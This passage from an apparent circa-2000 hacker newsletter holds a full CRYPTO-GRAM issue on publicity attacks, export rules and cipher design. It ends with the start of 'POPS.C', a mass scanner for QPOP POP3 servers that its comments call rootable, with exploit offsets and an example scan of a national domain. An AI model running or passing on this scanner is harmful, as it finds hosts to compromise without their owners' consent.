software of DVDs to their Web sites Wired: Outpost Leaves Data Unguarded <http://www.wired.com/news/technology/0,1282,33842,00.html> - While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too ******* What's new with SecurityPortal.com ******* The Unbreakable Cipher: Why Not Just Stay With Perfection? John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here. <http://securityportal.com/direct.cgi?/topnews/crypto20000119.html> Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com <mailto:webmaster@securityportal.com> . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com> @HWA 19.0 CRYPTOGRAM Jan 15th ~~~~~~~~~~~~~~~~~~~ Forwarded From: Bruce Schneier <schneier@counterpane.com> CRYPTO-GRAM January 15, 2000 by Bruce Schneier Founder and CTO Counterpane Internet Security, Inc. schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 2000 by Bruce Schneier ** *** ***** ******* *********** ************* In this issue: "Key Finding" Attacks and Publicity Attacks Counterpane -- Featured Research News New U.S. Encryption Regulations Counterpane Internet Security News The Doghouse: Netscape Block and Stream Ciphers Comments from Readers ** *** ***** ******* *********** ************* "Key Finding" Attacks and Publicity Attacks A couple of weeks ago the New York Times reported a new "key finding" attack. This was a follow-up to some research discussed here some months ago, showing how to search for, and find, public and private cryptographic keys in software because of their random bit patterns. The company nCipher demonstrated that someone who has access to a Web server that uses SSL can find the SSL private key using these techniques, and potentially steal it. nCipher's press release talked of "a significant vulnerability to today's Internet economy." Huh? Why is this news? It's not the fact that the SSL private keys are on the Web server. That's obvious; they have to be there. It's not the fact that someone who has access to the Web server can potentially steal the private keys. That's obvious, too. It's not the news that a CGI attack can compromise data on a Web server. We've seen dozens of those attacks in 1999. Even the press release admits that "no information is known to have been compromised using a 'key-finding' attack. Neither nCipher nor the New York Times found anyone who was vulnerable. But wait . . . nCipher sells a solution to this "problem." Okay, now I understand. I call this kind of thing a publicity attack. It's a blatant attempt by nCipher to get some free publicity for the hardware encryption accelerators, and to scare e-commerce vendors into purchasing them. And people fall for this, again and again. This kind of thing is happening more and more, and I'm getting tired of it. Here are some more examples: * An employee of Cryptonym, a PKI vendor, announced that he found a variable with the prefix "NSA" inside Microsoft's cryptographic API. Based on absolutely zero evidence, this was held up as an example of NSA's manipulation of the Microsoft code. * Some people at eEye discovered a bug in IIS last year, completely compromising the product. They contacted Microsoft, and after waiting only a week for them to acknowledge the problem, they issued a press release and a hacker tool. Microsoft rushed a fix out, but not as fast as the hackers jumped on the exploit. eEye sells vulnerability assessment tools and security consulting, by the way. I'm a fan of full disclosure -- and definitely not a fan of Microsoft's security -- and believe that security vulnerabilities need to be publicized before they're fixed. (If you don't publicize, the vendors often don't bother fixing them.) But this practice of announcing "vulnerabilities" for the sole purpose of hyping your own solutions has got to stop. Here are some examples of doing things right: * The University of California Berkeley researchers have broken just about every digital cellphone security algorithm. They're not profiting from these breaks. They don't publish software packages that can listen in on cellphone calls. This is research, and good research. * Georgi Guninski has found a huge number of JavaScript holes over the past year or so. Rather than posting scary exploits and cracking tools that script kiddies could take advantage of, and rather than trying to grab the limelight, he has been quietly publishing the problems and available workarounds. Of course, the downside is that these bugs get less attention from Microsoft and Netscape, even though they are as serious as many others that have received more press attention and thus get fixed quickly by the browser makers. Nonetheless, this is good research. * The L0pht has done an enormous amount of good by exposing Windows NT security problems, and they don't try to sell products to fix the problems. (Although now that they've formed a VC-funded security consulting company, @Stake, they're going to have to tread more carefully.) * Perfecto markets security against CGI attacks. Although they try to increase awareness of the risks, they don't go around writing new CGI exploits and publicizing them. They point to other CGI exploits, done by hackers with no affiliation to the company, as examples of the problem. * Steve Bellovin at AT&T labs found a serious hole in the Internet DNS system. He delayed publication of this vulnerability for years because there was no readily available fix. How do you tell the difference? Look at the messenger. Who found the vulnerability? What was their motivation for publicizing? The nCipher announcement came with a Business Wire press release, and a PR agent who touted the story to reporters. These things are not cheap -- the press release alone cost over $1000 -- and should be an obvious tip-off that other interests are at stake. Also, look critically at the exploit. Is it really something new, or is it something old rehashed? Does it expose a vulnerability that matters, or one that doesn't? Is it actually interesting? If it's old, doesn't matter, and uninteresting, it's probably just an attempt at press coverage. And look at how it is released. The nCipher release included a hacker tool. As the New York Times pointed out, "thus making e-commerce sites more vulnerable to attack and more likely to buy nCipher's product." Announcements packaged with hacker tools are more likely to be part of the problem than part of the solution. I am a firm believer in open source security, and in publishing security vulnerabilities. I don't want the digital cellphone industry, or the DVD industry, to foist bad security off on consumers. I think the quality of security products should be tested just as the quality of automobiles is tested. But remember that security testing is difficult and time-consuming, and that many of the "testers" have ulterior motives. These motives are often just as much news as the vulnerability itself, and sometimes the announcements are more properly ignored as blatant self-serving publicity. The NY Times URLs using their search function change daily, but you can go to http://search.nytimes.com/plweb-cgi/ and use the Extended Search; the article title is "Attacks on Encryption Code Raise Questions About Computer Vulnerability". NCipher's press release: http://www.ncipher.com/news/files/press/2000/vulnerable.html NCipher's white paper (Acrobat format): http://www.ncipher.com/products/files/papers/pcsws/pcsws.pdf ** *** ***** ******* *********** ************* Counterpane -- Featured Research "A Cryptographic Evaluation of IPsec" N. Ferguson and B. Schneier, to appear We perform a cryptographic review of the IPsec protocol, as described in the November 1998 RFCs. Even though the protocol is a disappointment -- our primary complaint is with its complexity -- it is the best IP security protocol available at the moment. http://www.counterpane.com/ipsec.html ** *** ***** ******* *********** ************* News You can vote via the Internet in the Arizona Democratic primary. Does anyone other than me think this is terrifying? http://dailynews.yahoo.com/h/nm/19991217/wr/arizona_election_1.html An expert at the British government's computer security headquarters has endorsed open-source solutions as the most secure computer architecture available: http://212.187.198.142/news/1999/50/ns-12266.html The DVD Copy Control Association is pissed, and they're suing everyone in sight. http://www.cnn.com/1999/TECH/ptech/12/28/dvd.crack/ Moore's Law and its effects on cryptography: http://www.newscientist.com/ns/20000108/newsstory2.html Information warfare in the Information Age: http://www.cnn.com/1999/TECH/computing/12/30/info.war.idg/index.html http://www.it.fairfax.com.au/industry/19991227/A59706-1999Dec27.html Radio pirates: In the U.K., some radios can receive a digital signal that causes them to automatically switch to stations playing traffic reports. Hackers have figured out how to spoof the signal, forcing the radio to always tune to a particular station. Good illustration of the hidden vulnerabilities in digital systems. http://news.bbc.co.uk/hi/english/sci/tech/newsid_592000/592972.stm http://uk.news.yahoo.com/000106/18/d6jt.html Well, this sure is inaccurate: http://www.lancrypto.com/algorithms_e.htm Some months ago I mentioned the Y2K notice from Hart Scientific. They now have a sequel: http://www.hartscientific.com/y2k-2.htm RSA "digital vault" software: http://news.excite.com/news/pr/000111/ma-rsa-keon-software E-commerce encryption glitch; a good example of why people are the worst security problem. A programmer just forgot to reactivate the encryption. http://news.excite.com/news/r/000107/17/news-news-airlines-northwest Become an instant cryptography portal. Encryption.com, encryption2000.com, and 1-800-ENCRYPT are for sale. http://news.excite.com/news/bw/000111/wa-azalea-software http://www.encryption.com Mail encryption utility that lets you take back messages you regret sending. Does anyone believe that this is secure? http://www.zdnet.com:80/anchordesk/story/story_4323.html Human GPS implants: http://www.newscientist.com/ns/20000108/newsstory8.html Clinton's hacker scholarships: http://chronicle.com/free/2000/01/2000011001t.htm Microsoft is building a VPN into Windows 2000. Whose tunnel do you want to hack today? http://www.networkworld.com/news/2000/0110vpn.html Someone stole a bunch of credit card numbers from CD Universe, tried extortion, then posted some: http://www.wired.com/news/technology/0,1282,33563,00.html http://www.msnbc.com/news/355593.asp and Cybercash's reaction (with a nice quote about how impregnable their product's security is; way to wave a red flag at the hackers): http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html An interesting three-part article about video surveillance and its effect on society: http://www.villagevoice.com/issues/9840/boal.shtml The system used to fund a series of anti-Bush commercials loosely resembles my "street performer protocol," using the credit card company instead of a publisher as a trusted third party. They validate your card when you pledge, but only charge it if they get enough to run an ad: http://www.gwbush.com/ Street performer protocol: http://www.counterpane.com/street_performer.html You can steal subway rides on the NY City system by folding the Metrocard at precisely the right point. The Village Voice and NY Times ran stories about it, but those are no longer available, at least for free. There's a copy of the NYTimes story here: http://www.monkey.org/geeks/archive/9801/msg00052.html The 2600 "Off the Hook" RealAudio for 2/3/98 talks about it, starting around 54:35. The RealAudio is linked from here: http://www.2600.com/offthehook/1998/0298.html The White House released a national plan to protect America's computer systems from unauthorized intrusions. This plan includes the establishment of the controversial Federal Intrusion Detection Network (FIDNET), which would monitor activity on government computer systems. (So far, there are no plans to monitor commercial systems, but that can change. The government does want to involve industry in this.) The plan also calls for the establishment of an "Institute for Information Infrastructure Protection" and a new program that will offer college scholarships to students in the field of computer security in exchange for public service commitments. The scholarship program seems like a good idea; we need more computer security experts. http://www.thestandard.com/article/display/0,1151,8661,00.html http://dailynews.yahoo.com/h/ap/20000107/ts/clinton_cyber_terrorism_4.html http://news.excite.com/news/ap/000107/01/tech-clinton-cyber-terrorism http://www.msnbc.com/news/355783.asp http://www.computerworld.com/home/print.nsf/all/000107DB3A EPIC analysis: http://www.epic.org/security/CIP/ White House plan (PDF): http://www.whitehouse.gov/WH/EOP/NSC/html/documents/npisp-execsummary-000105 .pdf White House press release: http://www.epic.org/security/CIP/WH_pr_1_7_00.html White House press briefing: http://www.epic.org/security/CIP/WH_briefing_1_7_00.html ** *** ***** ******* *********** ************* New U.S. Encryption Regulations We have some, and they're a big improvement. On the plus side, "retail" encryption products -- like browsers, e-mail programs, or PGP -- will be widely exportable to all but a few countries "regardless of key length or algorithm." On the minus side, the new regulations are complex (an unending stream of work for the lawyers) and will still make it difficult for many people to freely exchange encryption products. They also do not address the Constitutional free speech concerns raised by encryption export controls. Major features of the new regs: * "Retail" encryption products are be exportable, regardless of key length or algorithm, to all but the designated "T-7" terrorist nations. In order to export you need to fill out paperwork. You need to get a retail classification, submit your product to a one-time technical review, and submit periodic reports of who products are shipped to (but not necessarily report end users). * Export of encryption products up to 64 bits in key length is completely liberalized. * "Non-retail" products will require a license for many exports, such as to foreign governments or foreign ISPs and telcos under certain circumstances. * Source code that is "not subject to an express agreement for the payment of a licensing fee or royalty for commercial production or sale of any product developed with the source code" is freely exportable to all but the T-7 terrorist countries. Source code exporters are required to send the Department of Commerce a copy of the code, or a URL, upon publication. Note that posting code on a web site for anonymous download is allowed; you are not required to check that downloaders might be from one of the prohibited countries. One obvious question is: "How does this affect the Bernstein and Karn court cases?" I don't know yet. The free speech concerns are not addressed, but the things that Bernstein and Karn wanted to do are now allowed. We'll have to see what the attorneys think. A more personal question is: "How does this affect the Applied Cryptography source code disks?" Near as I can tell, all I have to do is notify the right people and I can export them. I will do so as soon as I can. Stay tuned. The actual regs (legalese): http://www.eff.com/pub/Privacy/ITAR_export/2000_export_policy/20000112_crypt oexport_regs.html EFF's press release: http://www.eff.com/11300_crypto_release.html Reuters story with BSA and Sun reactions: http://news.excite.com/news/r/000112/19/tech-tech-encryption Reuters story with EFF reaction: http://news.excite.com/news/r/000113/13/tech-tech-encryption AEA reaction press release: http://news.excite.com/news/pr/000112/dc-aea-encryption-reg ACLU and EPIC reaction: http://news.excite.com/news/zd/000113/18/crypto-compromise-a ** *** ***** ******* *********** ************* Counterpane Internet Security News Bruce Schneier profiled in Business Week: http://businessweek.com/cgi-bin/ebiz/ebiz_frame.pl?url=/ebiz/9912/em1229.htm Bruce Schneier is speaking at BlackHat in Singapore, 3-4 April 2000. He'll also be at BlackHat and DefCon in Las Vegas. http://www.blackhat.org http://www.defcon.org Bruce Schneier is speaking at the RSA Conference in San Jose: Tuesday, 18 Jan, 2:00 PM, on the Analyst's Track. I don't know if it made it into the program, but Bruce will be on stage with Matt Blaze, Steve Bellovin, and several other really smart people. ** *** ***** ******* *********** ************* The Doghouse: Netscape Netscape encrypts users' e-mail passwords with a lousy algorithm. If this isn't enough, their comments to the press cement their inclusion in the doghouse: "Chris Saito, the senior director for product management at Netscape, said that the option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that 'computer experts could still access the information, in case someone forgot their password.'" In other words, they implemented lousy security on purpose. "Netscape's Saito said the company wasn't aware of the vulnerability and added that a 'security fix' would be forthcoming if that vulnerability were proved to exist. If the Javascript vulnerability doesn't exist, a password stealer would have to have physical access to a user's computer to figure out the algorithm." Note the complete ignorance of viruses like Melissa, or Trojan horses like Back Orifice. "Saito noted that Netscape already has numerous safety features, including a Secure Sockets Layer, which enables users to communicate securely with Web servers, and a protocol for encrypting e-mail messages sent." None of which matters if the password is stolen. http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html RST's information: http://www.rstcorp.com/news/bad-crypto.html http://www.rstcorp.com/news/bad-crypto-tech.html ** *** ***** ******* *********** ************* Block and Stream Ciphers Block and stream ciphers both transform a message from plaintext to ciphertext one piece at a time. Block ciphers apply the same transformation to every piece of the message, and typically deal with fairly large pieces of the message (8 bytes, 16 bytes) at a time. Stream ciphers apply a different transformation to each piece of the message, and typically deal with fairly small pieces of the message (1 bit, 1 byte) at a time. Traditionally they have been separate areas of research, but these days they are converging. And if you poke around at the issues a bit, you'll see that they not very different at all. Stream ciphers first. Traditional stream ciphers consist of three standard pieces: an internal state, a next-state function, and a plaintext-to-ciphertext transformation function. The internal state is generally small, maybe a hundred bits, and can be thought of as the key. The next-state function updates the state. The transformation function takes a piece of plaintext, mixes it with the current state, and produces the same size ciphertext. And then the stream cipher goes on to the next piece. The security of this scheme is based on how cryptographically annoying the two functions are. Sometimes just one of the functions is cryptographically annoying. In electronic stream ciphers, a complicated next-state function is usually combined with a simple transformation that takes the low-order bit of the state and XORs it with the plaintext. In rotor machines, such as the German Enigma, the next-state function was a simple stepping of various rotors, and the transformation function was very complicated. Sometimes both are cryptographically complicated. These ciphers could generally operate in two modes, depending on the input into the next-state function. If the only input was the current state, these were called output-feedback (OFB) ciphers. If there was the additional input of the previous ciphertext bit, these were called cipher-feedback (CFB) ciphers. (If you were in the U.S. military, you knew these modes as "key auto-key" (KAK) and "ciphertext auto-key (CTAK), respectively.) And you chose one mode over the other because of error propagation and resynchronization properties. (Applied Cryptography explains all this in detail.) Traditionally, stream cipher algorithms were as simple as possible. These were implemented in hardware, and needed as few gates as possible. They had to be fast. The result was many designs based on simple mathematical functions: e.g., linear feedback shift registers (LFSRs). They were analyzed based on metrics such as linear complexity and correlation immunity. Analysts looked at cycle lengths and various linear and affine approximations. Most U.S. military encryption algorithms, at least the ones in general use in the 1980s and before, are stream ciphers of these sorts. Block ciphers are different. They consist of a single function: one that takes a plaintext block (a 64-bit block size is traditional) and a key and produces a ciphertext block. The NSA calls these ciphers codebooks, and that is an excellent way to think of them. For each key, you can imagine building a table. On the left column is every possible plaintext block; on the right column is every possible ciphertext block. That's the codebook. It would be a large book, 18 billion billion entries for the smallest commonly used block ciphers, so it is easier to just implement the algorithm mathematically -- especially since you need a new book for each key. But in theory, you could implement it as a single table lookup in a very large codebook. Block ciphers can be used simply as codebooks, encrypting each 64-bit block independently (and, in fact, that is called electronic codebook (ECB) mode), but that has a bunch of security problems. An attacker can rearrange blocks, build up a portion of the codebook if he has some known plaintext, etc. So generally block ciphers are implemented in one of several chaining modes. Before listing the block cipher chaining modes, it's worth noticing that a block cipher algorithm can serve as any of the functions needed to build a stream cipher: the next-state function or the output function. And, in fact, that is what block cipher modes are: stream ciphers built using the block cipher as a primitive. A block cipher in output-feedback mode is simply the block cipher used as the next-state function, with the output of the block cipher being the simple output function. A block cipher in cipher-feedback mode is the same thing, with the addition of the ciphertext being fed into the next-state function. A block cipher in counter mode uses the block cipher as the output function, and a simple counter as the next-state function. Cipher block chaining (CBC) is another block-cipher mode; I've seen the NSA call this "cipher-driven codebook" mode. Here the block cipher is part of the plaintext-to-ciphertext transformation function, and the next-state function is simple. For some reason I can't explain, for many years academic research on block ciphers was more practical than research on stream ciphers. There were more concrete algorithm proposals, more concert analysis, and more implementations. While stream cipher research stayed more theoretical, block ciphers were used in security products. (I assume this was the reverse in the military, where stream ciphers were used in products and were the target of operational cryptanalysis resources.) DES's official sanction as a standard helped this, but before DES there was Lucifer. And after DES there was FEAL, Khufu and Khafre, IDEA, Blowfish, CAST, and many more. Recently, stream ciphers underwent something of a renaissance. These new stream ciphers were designed for computers and not for discrete hardware. Instead of producing output a bit at a time, they produced output a byte at a time (like RC4), or 32 bits at a time (like SEAL or WAKE). And they were no longer constrained by a small internal state -- RC4 takes a key and turns it into a 256-byte internal state, SEAL's internal state is even larger -- or tight hardware-based complexity restrictions. Stream ciphers, which used to be lean and mathematical, started looking as ugly and kludgy as block ciphers. And they started appearing in products as well. So, block and stream ciphers are basically the same thing; the difference is primarily a historical accident. You can use a block cipher as a stream cipher, and you can take any stream cipher and turn it into a block cipher. The mode you use depends a lot on the communications medium -- OFB or CBC makes the most sense for computer communications with separate error detection, while CFB worked really well for radio transmissions -- and the algorithm you choose depends mostly on performance, standardization, and popularity. There's even some blurring in modern ciphers. SEAL, a stream cipher, looks a lot like a block cipher in OFB mode. Skipjack, an NSA-designed block cipher, looks very much like a stream cipher. Some new algorithms can be used both as block ciphers and stream ciphers. But stream ciphers should be faster than block ciphers. Currently the fastest block ciphers encrypt data at 18 clock cycles per byte (that's Twofish, the fastest AES submission). The fastest stream ciphers are even faster: RC4 at 9 clock cycles per byte, and SEAL at 4. (I'm using a general 32-bit architecture for comparison; your actual performance may vary somewhat.) I don't believe this is an accident. Stream ciphers can have a large internal state that changes for every output, but block ciphers have to remain the same. RC4 has a large table -- you can think of it as an S-box -- that changes every time there is an output. Most block ciphers also have some kind of S-box, but it remains constant for each encryption with the same key. There's no reason why you can't take a block cipher, Blowfish for example, and tweak it so that the S-boxes modify themselves with every output. If you're using the algorithm in OFB mode, it will still encrypt and decrypt properly. But it will be a lot harder to break for two reasons. One, the internal state is a moving target and it is a lot harder for an attacker to build model of what is going on inside the state. Two, if the plaintext-to-ciphertext transformation is built properly, attacks based on chosen plaintext or chosen ciphertext are impossible. And if it is a lot harder to break a cipher with self-modifying internals, then you can probably get by with fewer rounds, or less complexity, or something. I believe that there is about a factor of ten speed difference between a good block cipher and a good stream cipher. Designing algorithms is very hard, and I don't suggest that people run out and modify every block cipher they see. We're likely to continue to use block ciphers in stream-cipher modes because that's what we're used to, and that's what the AES process is going to give us as a new standard. But further research into stream ciphers, and ways of taking advantage of the inherent properties of stream ciphers, is likely to produce families of algorithms with even better performance. ** *** ***** ******* *********** ************* Comments from Readers From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk> Subject: German smart-card hack The note on "German hackers have succeeded in cracking the Siemens digital signature chip" in the 1999-12-15 CRYPTO-GRAM is wrong. I have been in contact with the German Hacker (Christian Kahlo) behind this story. He discovered that one user of the Siemens SLE44 chip series included in his ROM software a routine that allowed him to upload and execute not only interpreter bytecode, but also raw 8052 assembler instructions. Using this undocumented facility, Christian uploaded a tiny assembler program that dumped the entire ROM of the card. The ROM was investigated, posted on the USENET as a documented disassembler listing in a TeX file and no vulnerabilities were found. Christian also discovered in the ROM that the SLE chips send out the chip type and serial number when the I/O line is held low during a positive reset edge and the following 600-700 clock cycles, which is a perfectly normal feature (comparable to the BIOS power-up message of a PC) that is fully documented in the SLE44 data sheets and that is not security relevant. No smartcard applications were hacked this way, no vulnerability was found in any smartcard application, and definitely no private keys were compromised. All this also has nothing to do with digital signatures. Any news to the contrary is the result of misunderstandings by journalists, who as usual fill in the gaps of the story with their limited technical background knowledge and try to formulate such reports to be more spectacular than the story behind them. The only policy that has been violated here is that Siemens -- like most other smartcard chip producers -- tries to make sure that nobody except big customers can easily get access to smartcard development kits that allow to upload assembler code directly, which might otherwise shorten the learning curve for a microprobing attacker slightly. Users of Siemens chips that allow code uploads are apparently required to use a bytecode interpreter instead. This policy seems to have been ignored secretly by one Siemens customer who left a backdoor in his byte-code interpreter to enable the later upload of high-speed crypto routines that cannot be implemented sufficiently efficient in the bytecode. Christian discovered this, even though he decided *not* publish the details on how he did this or the name of the Siemens customer in whose cards he had discovered this. All he published was a dump of the standard Siemens SLE ROM code (CMS = Chip Management System, comparable to a PC BIOS), a piece of code that had already been known semi-publicly for many years in the pay-TV hacking community from successful microprobing attacks on the SLE44 series. Christian's main contribution is that he has discovered a very nice low-cost assembler-level development kit for some of the SLE smartcards, which used to cost a fortune and an NDA before. This is not the first time that this has happened: Pay-TV smartcards have been shipped before with software that provides for uploads of EEPROM software patches with broken authentication techniques, which has been known and used in the smartcard tampering community for many years. From: anonymous Subject: Re: New U.S. Crypto Export Regulations In CRYPTO-GRAM of December 15, 1999 you wrote about the proposed new U.S. crypto export regulations, and I can agree with everything you said. However, I believe you missed something important: the view FROM the rest of the world. I work in the finance industry in Europe -- Zurich, to be precise -- and have some involvement with security. This industry (a) WILL NOT use U.S. crypto products, and (b) will certainly NOT make any long-term plans or partnerships to do so for U.S. products with consumer content, because (a) the products to date are forced by law to be weak, but more important, (b) the U.S. government can't be trusted. Even if it approved today the export of some products based on strong crypto, everyone knows that this permission could be terminated tomorrow for the same or other products. And everyone also suspects strongly that the U.S. government will in any case force providers to put trap doors into their products. Under the circumstances, the European finance and e-business industries would be have to be crazy to use U.S. crypto-based products. And they're not crazy. To play in this business in the rest of the world, the U.S. will have to have a clear, consistent, and favorable policy, and U.S. companies will have to present products that are demonstrably strong with no trap doors. (I invite you to speculate if this will happen before Hell freezes over.) In the meantime, there are plenty of non-U.S. products to choose from, and banks like UBS, Credit Suisse, Grupo Intesa, Societe General, Deutsche Bank, Generale Bank, Bank Austria, and Barclays are not sitting back anxiously waiting for U.S. products to become available. They're doing business with non-U.S. products that are just fine, thank you. From: "Grawrock, David" <david.grawrock@intel.com> Subject: Electronic voting All these comments regarding electronic voting and absentee voting are missing the mark. The State of Oregon has that all elections (except presidential) are done by mail. It's like the entire state is voting absentee. The process is actually pretty painless. You receive your voter pamphlet and then you get your ballot. It has to be in by election day. If you miss the excitement of going to the voting booth there are collection points where you can drop off your filled in ballot. It's really not that hard. The point here is that the state has determined that it is easier (and cheaper) to simply process the entire election via the absentee process. It now becomes a simple step to go from by mail to by electronic voting. All of the arguments regarding coercion must already have been answered (the government always thinks a process through completely). We have elected all sorts of politicians without anyone coming back and reporting problems with coercion. From: Gerry Brown <gerry@liberate.com> Subject: RE: Absentee Ballots I just checked some figures with a friend who has the data on Absentee Ballots for San Mateo County in California and he has compared it with the San Francisco elections held this week. The percentage of registered voters using absentee ballots is about 13%-15%. But the more astonishing is the fact that 35%-50% of those actually voting are done by absentee ballots. The lower figure is for national elections and the higher side corresponds to local elections. From: "Hillis, Brad" <BradH@DIS.WA.GOV> Subject: PKI article--agree and disagree I can't begin to tell you how much I enjoyed your article with Carl Ellison, "Ten Risks of PKI: What You're not Being Told about Public Key." I'm the lead ecommerce attorney for the state of Washington, and we are currently procuring a private PKI vendor to provide digital signatures for state and local government, similar to the federal government ACES procurement. What you say that PKI is not needed for ecommerce to flourish is true. It's a thought I keep having at all the digital signature law presentations I attend, and the theme I had planned to discuss at my March 7 talk in Boston on PKI. One has to keep asking oneself, why do I need a digital signature? What is the opportunity cost of setting up a PKI? (That is, what security improvements could I make if I spent the money on something besides PKI). However, I disagree with this statement in your article: "In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible." The law seems to say that at first reading, but my view of the law is that it sets up a "rebuttable presumption" of non-repudiation. This is the same rule that applies to physical, pen and ink signatures. Your statement reflects the views of some proponents of PKI who overstate the legal force of a "licensed digital signature" under Washington law. But if, in fact, I never applied my digital signature to a document, and I can prove it (e.g., I have an alibi), then I would not be legally responsible. I believe that is the situation in non-PKI electronic signature schemes, where a (paper and manually signed) Electronic Data Interchange Agreement or Trading Partner Agreement will state that all data submitted between the parties carries the same legal force as if it was manually signed. Having found flaws in the PKI-style laws of Washington, Utah and Minnesota, I do not find a great deal of higher or practical intelligence in the more popular electronic signature laws, either. Esignature laws have not proven any more important to ecommerce than PKI digital signature laws, so why are we in such a rush to pass UETA (uniform electronic transaction act)? From: "Carl Ellison" <cme@acm.org> Subject: Re: PKI article--agree and disagree You are correct. However, I believe we still need to warn against the rebuttable presumption of non-repudiation. The keyholder may have no alibi at all. The keyholder may not be aware that his key was misused (e.g., by an attacker who had gained physical or network access to his computer). This is similar to the position people were in in Britain when they were challenging ATM card operations. It took expert witnessing by Ross Anderson to defend some of their claims, and even then it didn't always work. There, too, the presumption was that the cardholder performed any operation when the ATM logs said he did -- whether he did or not. It was up to the cardholder to prove the negative. This gets even worse when the keyholder has his private key on a smartcard in his possession. It's that much harder to convince a jury that you didn't sign, if the merchant or bank can claim that the signing key never left your personal possession. When an attacker has network access to your computer, he doesn't leave a trail. You have no audit record showing the attack. It's your word against the merchant's and you have no evidence to offer on your behalf. You can't even accuse anyone else. You have no idea who to accuse. Meanwhile, your account has been debited until you manage to prove your point (against the presumption that you're lying). When you compare this to credit card purchases, it's radically different. With a credit card, you have not spent anything until you write the check to the credit card company. When or before you write that check, you can challenge a line item and force the merchant to prove that you were in fact the purchaser. At least with my AMEX account, the immediate result is that AMEX removes the item from my statement -- to be reinstated if the merchant is able to prove that I did do the purchase. I have had such challenges go my way once and the other times, I had simply forgotten. In one case, I thought I was being double-billed, but it turns out I had never been billed the first time (many months before). From: Alfred John Menezes <ajmeneze@cacr.math.uwaterloo.ca> Subject: Elliptic Curve Cryptosystems I read with interest your recent article on ECC in the November 15 issue of Crypto-Gram. I agree with most of your statements and comments. Your recommendations were: 1) If you're working in a constrained environment where longer keys just won't fit, consider elliptic curves. 2) If the choice is elliptic curves or no public-key algorithms at all, use elliptic curves. 3) If you don't have performance constraints, use RSA. 4) If you are concerned about security over the decades (and almost no systems are), use RSA. I certainly agree with recommendations 1) and 2) -- ECC certainly cannot be worse than no security at all! Regarding recommendation 3), I think that most environments which call for public-key solutions will have *some* performance constraints. The limiting factor could be an over-burdened web server which needs to sign thousands of outgoing messages per minute, a handheld device which is communicating with a PC, etc. In such scenarios, one should select the public-key method that performs the best in the most constrained environment. If the constraints involve key sizes, bandwidth, power consumption, or speed (for private key operations), then ECC is likely the method of choice over RSA. Finally, I feel that your recommendation that RSA should be used (instead of ECC) in situations where you are concerned with long-term security is a bit unfair. After all, as you state in the postscript to your article, all the analysis you used on the elliptic curve discrete logarithm problem also applies to the integer factorization problem. I propose that applications which do require long-term security should consider using both* RSA and ECC -- by double encrypting a message with RSA and ECC, or by signing a message twice with RSA and ECC. The following are my condensed thoughts on the security and efficiencies of ECC as compared with RSA. They should be considered a supplement to your Crypto-Gram article, and not a replacement of it. http://www.cacr.math.uwaterloo.ca/~ajmeneze/misc/cryptogram-article.html ((This is a good essay, but remember the author's bias. He works for Certicom, and it is in his financial interest for you to believe in elliptic curves. --Bruce)) ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of Counterpane Internet Security Inc., the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on computer security and cryptography. Counterpane Internet Security, Inc. is a venture-funded company bringing innovative managed security solutions to the enterprise. http://www.counterpane.com/ Copyright (c) 2000 by Bruce Schneier ISN is sponsored by Security-Focus.COM @HWA 20.0 POPS.C qpop vulnerability scanner by Duro ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* POPScan QPOP/UCB/SCO scanner by duro duro@dorx.net takes list of ip's from stdin The hosts gathered by this scanner are almost 100% vulnerable to a remote root attack. The exploits used to root the vulnerable machines can all be found by searching bugtraq. UCB pop is 100% of the time vulnerable to the qpop exploit (it's a very old version of qpop). The QPOP version is filitered to make sure that non-vulnerable versions do not show up in the scan. Common offsets for the bsd qpop exploit are: 621, 1500, 500, 300, 900, 0 Example usage: ./z0ne -o ac.uk | ./pops > ac.uk.log & would scan ac.uk for vulnerabilities. much help from jsbach */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <signal.h> int ADMtelnet (u_long, int port); char domain[50]; int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */ char ip[16]; int temp1 = 0; void scan(char *ip); void alrm(void) { return; } main() { while( (fgets(ip, sizeof(ip), stdin)) != NULL) switch(fork()) { case 0: { scan(ip); exit(0); } case -1: { printf("cannot fork so many timez@!@^&\n"); exit(0); break; } default: { currchilds++; if (currchilds > NUMCHILDREN) wait(NULL); break; } } } void scan(char *ip) { char printip[16]; struct sockaddr_in addr; int sockfd; char buf[512]; bzero((struct sockaddr_in *)&addr, sizeof(addr)); sockfd = socket(AF_INET, SOCK_STREAM, 0); addr.sin_addr.s_addr = inet_addr(ip); addr.sin_port = htons(110); addr.sin_family = AF_INET; signal(SIGALRM, alrm); alarm(5); if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1)) { recv(sockfd, (char *)buf, sizeof(buf), 0); if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL) { checkos(ip,1); } if((strstr(buf, "UCB")) != NULL) checkos(ip,2); 